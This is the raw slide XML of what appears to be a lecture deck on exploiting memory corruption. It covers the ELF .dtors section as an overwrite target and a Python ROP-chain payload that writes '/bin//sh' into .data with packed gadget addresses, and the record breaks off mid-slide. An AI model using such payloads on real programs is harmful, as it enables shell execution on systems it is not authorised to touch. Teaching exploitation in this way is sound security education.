                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>' + '\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>1a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>e9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>06</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>08</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> +' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"`</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>So let’s write our payload in a Python script</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359</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="187096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9602" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The .dtors Section</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1049603" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The ELF format includes a number of sections with special meaning </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>init</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ctors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> sections contain code to be executed before the actual program code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dtors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> sections contain code to be executed after the actual program code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dtors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> section is not read-only</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Section is a list of four-byte addresses (starts with 0xffffffff and ends with 0x00000000)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The first address after the 0xffffffff is a good target for address overwriting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="195884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9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9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9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96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496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496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8155"/>
            <a:ext cx="8229600" cy="6400800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>import</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>pack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> = 50 * '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>' + '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>bcde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Copy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> to .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> += </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>('&lt;I', 0x0806e91a) # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>pop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> += </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>('&lt;I', 0x080ea060) # @.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> += </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>('&lt;I', 0x080bb6d6) # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>pop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> += '/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> += </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>('&lt;I', 0x0809a67d) # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Copy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> to @.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> + 4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
